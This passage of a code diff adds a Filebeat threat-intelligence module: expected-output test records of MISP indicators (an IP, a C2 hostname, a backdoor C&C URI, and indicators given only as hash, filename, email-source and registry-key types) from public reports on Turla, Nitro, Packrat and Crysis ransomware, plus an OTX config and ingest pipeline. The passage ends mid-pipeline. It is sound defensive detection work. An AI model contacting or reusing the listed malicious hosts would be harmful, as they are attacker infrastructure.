"threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "1st stage", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "14", + "threatintel.misp.attribute.id": "10794", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1542652482", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "domain|ip", + "threatintel.misp.attribute.value": "your-ip.getmyip.com|178.128.103.74", + "threatintel.misp.attribute_count": "7", + "threatintel.misp.date": "2017-08-25", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "5", + "threatintel.misp.info": "OSINT - New Arena Crysis Ransomware Variant Released", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226331", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "59a3d08d-5dc8-4153-bc7c-456d950d210f" + }, + { + "@timestamp": "2017-03-30T12:55:50.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 16434, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:tool=Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "4", + "threatintel.misp.attribute.id": "342", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1490878550", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "link", + "threatintel.misp.attribute_count": "100", + "threatintel.misp.date": "2017-03-30", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "4", + "threatintel.misp.info": "OSINT - Carbon Paper: Peering into Turla\u2019s second stage backdoor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226330", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "58dcfe62-ed84-4e5e-b293-4991950d210f" + }, + { + "@timestamp": "2014-10-06T07:09:54.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 20139, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1077", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579394", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "sha256", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:10:57.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 21711, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1084", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579457", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "ip-dst", + "threatintel.misp.attribute.value": "223.25.233.248", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:12:28.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 23232, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1086", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579548", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "hostname", + "threatintel.misp.attribute.value": "xenserver.ddns.net", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:12:57.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 24759, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1089", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579577", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "text", + "threatintel.misp.attribute.value": "Nitro", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2016-02-18T20:12:23.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 26271, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1090", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1455826343", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "sha1", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2016-05-05T13:29:23.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 27875, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12394", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1462454963", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "domain", + "threatintel.misp.attribute.value": "whatsapp.com", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2018-01-08T16:08:12.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 29397, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "Fake adobe URL", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17299", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515427692", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "url", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2018-01-08T16:31:29.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 31486, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "Win32 backdoor C&C URI", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17330", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515429089", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "uri", + "threatintel.misp.attribute.value": "/scripts/m/query.php?id=", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2018-01-08T16:31:29.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 33567, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Artifacts dropped", + "threatintel.misp.attribute.comment": "JavaScript backdoor", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17322", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515429089", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "filename|sha1", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2016-02-23T22:27:02.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 35697, + "service.type": "threatintel", + "tags": [ + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Payload delivery", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12268", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1456266422", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "email-src", + "threatintel.misp.attribute_count": "133", + "threatintel.misp.date": "2015-12-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "22", + "threatintel.misp.info": "Packrat: Seven Years of a South American Threat Actor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "4", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CUDESO", + "threatintel.misp.orgc.uuid": "56c42374-fdb8-4544-a218-41ffc0a8ab16", + "threatintel.misp.orgc_id": "4", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637901", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "56ccdcaf-f7e4-40d8-bca1-51299062e56a" + }, + { + "@timestamp": "2016-02-23T22:27:34.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 37011, + "service.type": "threatintel", + "tags": [ + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Artifacts dropped", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12298", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1456266454", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "regkey", + "threatintel.misp.attribute_count": "133", + "threatintel.misp.date": "2015-12-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "22", + "threatintel.misp.info": "Packrat: Seven Years of a South American Threat Actor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "4", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CUDESO", + "threatintel.misp.orgc.uuid": "56c42374-fdb8-4544-a218-41ffc0a8ab16", + "threatintel.misp.orgc_id": "4", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637901", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "56ccdcaf-f7e4-40d8-bca1-51299062e56a" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/module.yml b/x-pack/filebeat/module/threatintel/module.yml new file mode 100644 index 000000000000..ed97d539c095 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/module.yml @@ -0,0 +1 @@ +--- diff --git a/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml b/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml new file mode 100644 index 000000000000..d74b9993dae8 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml @@ -0,0 +1,29 @@ +- name: otx + type: group + description: > + Fields for OTX Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the indicator. + - name: indicator + type: keyword + description: > + The value of the indicator, for example if the type is domain, this would be the value. + - name: description + type: keyword + description: > + A description of the indicator. + - name: title + type: keyword + description: > + Title describing the indicator. + - name: content + type: keyword + description: > + Extra text or descriptive content related to the indicator. + - name: type + type: keyword + description: > + The indicator type, can for example be "domain, email, FileHash-SHA256". diff --git a/x-pack/filebeat/module/threatintel/otx/config/config.yml b/x-pack/filebeat/module/threatintel/otx/config/config.yml new file mode 100644 index 000000000000..7cb4b9368677 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/config/config.yml @@ -0,0 +1,60 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json +- set: + target: header.X-OTX-API-KEY + value: {{ .api_token }} +- set: + target: url.params.types + value: {{ .types }} +- set: + target: url.params.modified_since + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "RFC3339" ]]' + +response.split: + target: body.results + +response.pagination: +- set: + target: url.value + value: '[[ .last_response.body.next ]]' +cursor: + timestamp: + value: '[[ formatDate (now (parseDuration "-{{ .lookback_range }}")) "RFC3339" ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: id + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml new file mode 100644 index 000000000000..08ce44a43d72 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml @@ -0,0 +1,162 @@ +description: Pipeline for parsing MISP Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.otx + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +## File indicator operations +- set: + field: threatintel.indicator.type + value: file + if: "ctx.threatintel?.otx?.type.startsWith('FileHash') || ctx.threatintel?.otx?.type == 'filepath'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.md5 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-MD5'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.sha1 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-SHA1'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.sha256 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-SHA256'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.pehash + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-PEHASH'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.imphash + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-IMPHASH'" + +## IP indicator operations +- set: + field: threatintel.indicator.type + value: ipv4-addr + if: ctx.threatintel?.otx?.type == 'IPv4' +- set: + field: threatintel.indicator.type + value: ipv6-addr + if: ctx.threatintel?.otx?.type == 'IPv6' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.ip + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx?.threatintel?.indicator?.type)" + +## URL indicator operations +- set: + field: threatintel.indicator.type + value: url + if: "ctx?.threatintel?.indicator?.type == null && ['url', 'uri'].contains(ctx.threatintel?.otx?.type)" +- uri_parts: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url.full + ignore_missing: true + if: "ctx?.threatintel?.otx?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url.path + ignore_missing: true + if: "ctx?.threatintel?.otx?.type == 'uri'" + +## Email indicator operations +- set: + field: threatintel.indicator.type + value: email-addr + if: ctx?.threatintel?.otx?.type == 'email' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.email.address + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'email-addr'" + +## Domain indicator operations +- set: + field: threatintel.indicator.type + value: domain-name + if: ctx.threatintel?.otx?.type == 'domain' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.domain + ignore_missing: true + if: 